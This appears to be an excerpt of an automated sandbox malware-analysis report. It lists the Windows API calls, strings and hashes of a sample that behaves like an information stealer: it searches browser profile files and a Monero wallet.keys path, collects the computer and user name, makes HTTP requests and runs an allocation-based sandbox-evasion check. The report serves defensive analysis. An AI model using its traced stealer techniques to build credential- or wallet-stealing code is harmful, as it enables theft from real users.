                                    APIs
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00D38C68,?,000A110C,?,00000000,?,000A1110,?,00000000,000A0AEF), ref: 00096ACA
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00096AE8
                                    • CloseHandle.KERNEL32(00000000), ref: 00096AF9
                                    • Sleep.KERNEL32(00001770), ref: 00096B04
                                    • CloseHandle.KERNEL32(?,00000000,?,00D38C68,?,000A110C,?,00000000,?,000A1110,?,00000000,000A0AEF), ref: 00096B1A
                                    • ExitProcess.KERNEL32 ref: 00096B22
                                    Similarity
                                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                    • String ID:
                                    • API String ID: 941982115-0
                                    • Opcode ID: 83a074dc99b91b022755e831056145b6c648e76b93a642c276cf680f1330514f
                                    • Instruction ID: 8e6ff322a79a44aee732aef5a931523b1c9842281e0e7d7e483b3c55266c8cf8
                                    • Opcode Fuzzy Hash: 83a074dc99b91b022755e831056145b6c648e76b93a642c276cf680f1330514f
                                    • Instruction Fuzzy Hash: 3BF05E70A44209ABEF10ABA0EC1ABBE7B74FB04745F104514B512A11C2DBB25540FA97

                                    Control-flow Graph

                                    APIs
                                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00084839
                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00084849
                                    Strings
                                    Similarity
                                    • API ID: CrackInternetlstrlen
                                    • String ID: <
                                    • API String ID: 1274457161-4251816714
                                    • Opcode ID: 3669835081fc29e5a5ec3626f1c3143fc1ce5726a4b6e4eb0c9409ec89a7f142
                                    • Instruction ID: 8b735cf9d828b78bb5e77173c6e166802ab76ecd97fa2691232cc95eb9fd9049
                                    • Opcode Fuzzy Hash: 3669835081fc29e5a5ec3626f1c3143fc1ce5726a4b6e4eb0c9409ec89a7f142
                                    • Instruction Fuzzy Hash: D2214FB1D00209ABDF14DFA4E849ADE7B74FF45320F108625F925A72C1EB706A09CF91

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                      • Part of subcall function 00086280: InternetOpenA.WININET(000A0DFE,00000001,00000000,00000000,00000000), ref: 000862E1
                                      • Part of subcall function 00086280: StrCmpCA.SHLWAPI(?,00D3FCE0), ref: 00086303
                                      • Part of subcall function 00086280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00086335
                                      • Part of subcall function 00086280: HttpOpenRequestA.WININET(00000000,GET,?,00D3F488,00000000,00000000,00400100,00000000), ref: 00086385
                                      • Part of subcall function 00086280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000863BF
                                      • Part of subcall function 00086280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000863D1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00095228
                                    Strings
                                    Similarity
                                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                    • String ID: ERROR$ERROR
                                    • API String ID: 3287882509-2579291623
                                    • Opcode ID: afaa01846a564d7f5c46fc31297620feb6b0e9d8ff43d21689d80520259d924e
                                    • Instruction ID: 76e121dc5425604fe00f2fa5ebc5cabc0ea154c32812741bcf76bfd684cc83e5
                                    • Opcode Fuzzy Hash: afaa01846a564d7f5c46fc31297620feb6b0e9d8ff43d21689d80520259d924e
                                    • Instruction Fuzzy Hash: 7911EC30A10548ABCF14FFA4DD52AED7378AF51340F404168F91A5A593EF70AB0AE7D2
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00097910
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00097917
                                    • GetComputerNameA.KERNEL32(?,00000104), ref: 0009792F
                                    Similarity
                                    • API ID: Heap$AllocateComputerNameProcess
                                    • String ID:
                                    • API String ID: 1664310425-0
                                    • Opcode ID: c72957d4c71c0338fa65cb33da775f6f6d6934abbe7b4bb05429ae7188211f02
                                    • Instruction ID: baa3f63b23dc38181db5b74ebc341b919c036db1a778509a126945ffe7204b72
                                    • Opcode Fuzzy Hash: c72957d4c71c0338fa65cb33da775f6f6d6934abbe7b4bb05429ae7188211f02
                                    • Instruction Fuzzy Hash: 6A01A9B1A44208EFDB10DF94DD49FAEBBF8F704B15F10421AF645E3280C37459008BA1
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0008112B
                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00081132
                                    • ExitProcess.KERNEL32 ref: 00081143
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$AllocCurrentExitNumaVirtual
                                    • String ID:
                                    • API String ID: 1103761159-0
                                    • Opcode ID: e86ad2344097af7dbbcc7aaecae2fa82eb3ee2dac90205f9c37d241d14b668b9
                                    • Instruction ID: a47a99a9f603b438b4e32d1a064a6a65cffab5828dcf2b3c2e045da3c7da6f23
                                    • Opcode Fuzzy Hash: e86ad2344097af7dbbcc7aaecae2fa82eb3ee2dac90205f9c37d241d14b668b9
                                    • Instruction Fuzzy Hash: 2CE0E67098530CFBE7506BA0AC0EF4D76BCBF04B05F104154F709761D0D6B52A419B99
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 000810B3
                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 000810F7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocFree
                                    • String ID:
                                    • API String ID: 2087232378-0
                                    • Opcode ID: 4be79213e06cbb8912737c47ca2827ce441d176e441a5e1e3777b3f0415a02bd
                                    • Instruction ID: f62d1edb28f9359dc8e6204123d76ed47eb8a4eda47d5d6347a24f6fe8c715dd
                                    • Opcode Fuzzy Hash: 4be79213e06cbb8912737c47ca2827ce441d176e441a5e1e3777b3f0415a02bd
                                    • Instruction Fuzzy Hash: 4BF0E271641208BBEB14ABA8AC4DFEEB7ECE705B15F300548F544E3280D5729E00DBA0
                                    APIs
                                      • Part of subcall function 000978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00097910
                                      • Part of subcall function 000978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00097917
                                      • Part of subcall function 000978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0009792F
                                      • Part of subcall function 00097850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000811B7), ref: 00097880
                                      • Part of subcall function 00097850: RtlAllocateHeap.NTDLL(00000000), ref: 00097887
                                      • Part of subcall function 00097850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0009789F
                                    • ExitProcess.KERNEL32 ref: 000811C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$Process$AllocateName$ComputerExitUser
                                    • String ID:
                                    • API String ID: 3550813701-0
                                    • Opcode ID: 0e0f5a116930367f754f5aa5e12448f73e73587bb73fdde90d1908d56cc693bc
                                    • Instruction ID: 6714c892f37c5318c3fd1beaa6b26343532c1a0627e89f3d8b937a5799d27840
                                    • Opcode Fuzzy Hash: 0e0f5a116930367f754f5aa5e12448f73e73587bb73fdde90d1908d56cc693bc
                                    • Instruction Fuzzy Hash: CAE0ECB696420552DE0073B0BC0EFAA329C6B15349F044425BA09D2203FE25E80196AA
                                    APIs
                                    • wsprintfA.USER32 ref: 000938CC
                                    • FindFirstFileA.KERNEL32(?,?), ref: 000938E3
                                    • lstrcat.KERNEL32(?,?), ref: 00093935
                                    • StrCmpCA.SHLWAPI(?,000A0F70), ref: 00093947
                                    • StrCmpCA.SHLWAPI(?,000A0F74), ref: 0009395D
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00093C67
                                    • FindClose.KERNEL32(000000FF), ref: 00093C7C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                    • API String ID: 1125553467-2524465048
                                    • Opcode ID: c1fa08334285ac62e297faf4e98e9c1fd797fe1c28827dbc4cb3e2c51c29f3d5
                                    • Instruction ID: 6b8b351409bf9321cee3fcb139284c14329804460de1aff4aca52e2363f27117
                                    • Opcode Fuzzy Hash: c1fa08334285ac62e297faf4e98e9c1fd797fe1c28827dbc4cb3e2c51c29f3d5
                                    • Instruction Fuzzy Hash: 8DA13EB1A0021C9BDF24DBA4DC89FEE73B9BF49304F044598B64D96141EB759B84CFA2
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                    • FindFirstFileA.KERNEL32(00000000,?,000A0B32,000A0B2B,00000000,?,?,?,000A13F4,000A0B2A), ref: 0008BEF5
                                    • StrCmpCA.SHLWAPI(?,000A13F8), ref: 0008BF4D
                                    • StrCmpCA.SHLWAPI(?,000A13FC), ref: 0008BF63
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0008C7BF
                                    • FindClose.KERNEL32(000000FF), ref: 0008C7D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                    • API String ID: 3334442632-726946144
                                    • Opcode ID: a17d1c421f1a9e76dc878f80d408e4a2a4655da024be185a70879c6ffe955240
                                    • Instruction ID: 9fc96193a4b98e883a33197d564350c3ef2476bb4b703228bb949bc5950da0dd
                                    • Opcode Fuzzy Hash: a17d1c421f1a9e76dc878f80d408e4a2a4655da024be185a70879c6ffe955240
                                    • Instruction Fuzzy Hash: A5425172A10108ABDF14FBB0DD96EEE737DAF45300F404558B90A96192EF349B49DBE2
                                    APIs
                                    • wsprintfA.USER32 ref: 0009492C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00094943
                                    • StrCmpCA.SHLWAPI(?,000A0FDC), ref: 00094971
                                    • StrCmpCA.SHLWAPI(?,000A0FE0), ref: 00094987
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00094B7D
                                    • FindClose.KERNEL32(000000FF), ref: 00094B92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s$%s\%s$%s\*
                                    • API String ID: 180737720-445461498
                                    • Opcode ID: 1c53e8fcda11bdd429df30ce2640c2524bebf9b8395d8f60b7d2944f64576414
                                    • Instruction ID: 06d51822cb6b53465f5aed4d2a406f584295bb902355df0c62769b0c78fc268d
                                    • Opcode Fuzzy Hash: 1c53e8fcda11bdd429df30ce2640c2524bebf9b8395d8f60b7d2944f64576414
                                    • Instruction Fuzzy Hash: 656136B190021CABCF24EBA0EC49FEA73BCBB49705F048698F64996141EB75DB45CF91
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00094580
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00094587
                                    • wsprintfA.USER32 ref: 000945A6
                                    • FindFirstFileA.KERNEL32(?,?), ref: 000945BD
                                    • StrCmpCA.SHLWAPI(?,000A0FC4), ref: 000945EB
                                    • StrCmpCA.SHLWAPI(?,000A0FC8), ref: 00094601
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0009468B
                                    • FindClose.KERNEL32(000000FF), ref: 000946A0
                                    • lstrcat.KERNEL32(?,00D3FCD0), ref: 000946C5
                                    • lstrcat.KERNEL32(?,00D3E168), ref: 000946D8
                                    • lstrlen.KERNEL32(?), ref: 000946E5
                                    • lstrlen.KERNEL32(?), ref: 000946F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                    • String ID: %s\%s$%s\*
                                    • API String ID: 671575355-2848263008
                                    • Opcode ID: a11ce234c09430b4d1a744189129c460237a473bd51d625fde2416f847a0941a
                                    • Instruction ID: 236c7cb73e8e8414d04ecd1eab507886a7db401ed5eba9bde5cbf111871371ac
                                    • Opcode Fuzzy Hash: a11ce234c09430b4d1a744189129c460237a473bd51d625fde2416f847a0941a
                                    • Instruction Fuzzy Hash: 555153B194021C9BCB60EBB0EC89FED737CBB58304F404598F64996191EB759B858F92
                                    APIs
                                    • wsprintfA.USER32 ref: 00093EC3
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00093EDA
                                    • StrCmpCA.SHLWAPI(?,000A0FAC), ref: 00093F08
                                    • StrCmpCA.SHLWAPI(?,000A0FB0), ref: 00093F1E
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0009406C
                                    • FindClose.KERNEL32(000000FF), ref: 00094081
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 180737720-4073750446
                                    • Opcode ID: 9f0d0db778eac9e3ba04acc3d0aee3cf8ccd9e56ff1481169b0c828ba58dbceb
                                    • Instruction ID: 024379edb624e2249a6fb273a68818aa239a949ba7fc5f15b34161cf8a36e278
                                    • Opcode Fuzzy Hash: 9f0d0db778eac9e3ba04acc3d0aee3cf8ccd9e56ff1481169b0c828ba58dbceb
                                    • Instruction Fuzzy Hash: DA5145B290021CABCF24FBB0DC89EEA737CBB48304F448598F65996141DB759B89DF91
                                    APIs
                                    • wsprintfA.USER32 ref: 0008ED3E
                                    • FindFirstFileA.KERNEL32(?,?), ref: 0008ED55
                                    • StrCmpCA.SHLWAPI(?,000A1538), ref: 0008EDAB
                                    • StrCmpCA.SHLWAPI(?,000A153C), ref: 0008EDC1
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0008F2AE
                                    • FindClose.KERNEL32(000000FF), ref: 0008F2C3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\*.*
                                    • API String ID: 180737720-1013718255
                                    • Opcode ID: 2790134075c3cb5cfecde7754bea0c230976e482b140a22285a1fb1cd371cd2f
                                    • Instruction ID: e47a9560e908060eee7d60334693630180b6ab3e19a9b81e108ebefa5adf73b7
                                    • Opcode Fuzzy Hash: 2790134075c3cb5cfecde7754bea0c230976e482b140a22285a1fb1cd371cd2f
                                    • Instruction Fuzzy Hash: D4E1BF72A111189ADF54FB60DC56EEE7378AF55300F4041A9B50A66093EF306F8ADFA2
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,000A15B8,000A0D96), ref: 0008F71E
                                    • StrCmpCA.SHLWAPI(?,000A15BC), ref: 0008F76F
                                    • StrCmpCA.SHLWAPI(?,000A15C0), ref: 0008F785
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0008FAB1
                                    • FindClose.KERNEL32(000000FF), ref: 0008FAC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: prefs.js
                                    • API String ID: 3334442632-3783873740
                                    • Opcode ID: 27f4b312e8c3a04feb544f72ef8df6af29fdfcc9b5510505a1ab0b2f409fd250
                                    • Instruction ID: 7a4cb63954ac0fd97b0ae3ce13ad8a996de632e33909f512e23be2b31ee8c147
                                    • Opcode Fuzzy Hash: 27f4b312e8c3a04feb544f72ef8df6af29fdfcc9b5510505a1ab0b2f409fd250
                                    • Instruction Fuzzy Hash: 0EB14F71A101189BDF24FF70DC96EEE7379BF55300F4081A8A54A9A192EF306B49DBD2
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,000A510C,?,?,?,000A51B4,?,?,00000000,?,00000000), ref: 00081923
                                    • StrCmpCA.SHLWAPI(?,000A525C), ref: 00081973
                                    • StrCmpCA.SHLWAPI(?,000A5304), ref: 00081989
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00081D40
                                    • DeleteFileA.KERNEL32(00000000), ref: 00081DCA
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00081E20
                                    • FindClose.KERNEL32(000000FF), ref: 00081E32
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 1415058207-1173974218
                                    • Opcode ID: c0e1d9ca4e857002bf6259f725d7bec2bbafe2a22c112666ee493b98418ecc4d
                                    • Instruction ID: 5292498df5bd8c66e5c56bb3b65f96054af7b6da1a6716a04c4fba5dfbad6f2b
                                    • Opcode Fuzzy Hash: c0e1d9ca4e857002bf6259f725d7bec2bbafe2a22c112666ee493b98418ecc4d
                                    • Instruction Fuzzy Hash: C312CD71A10118ABDF15FB60DC96EEE7378BF55300F404199A50A66092EF706F89DFE2
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,000A0C2E), ref: 0008DE5E
                                    • StrCmpCA.SHLWAPI(?,000A14C8), ref: 0008DEAE
                                    • StrCmpCA.SHLWAPI(?,000A14CC), ref: 0008DEC4
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0008E3E0
                                    • FindClose.KERNEL32(000000FF), ref: 0008E3F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2325840235-1173974218
                                    • Opcode ID: f3a0de8a7192376be8c2d57a21fcf6d5a837e6d24efa5755a30c7d7a6efabc1f
                                    • Instruction ID: 68ac8c5287533fb878b18d4ab7af8448c13f6efb219644ed3835148c7220d62f
                                    • Opcode Fuzzy Hash: f3a0de8a7192376be8c2d57a21fcf6d5a837e6d24efa5755a30c7d7a6efabc1f
                                    • Instruction Fuzzy Hash: 26F191719241289ADF15FB60DC95EEE7378BF15300F4041DAB51A66092EF306F8ADFA2
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,000A14B0,000A0C2A), ref: 0008DAEB
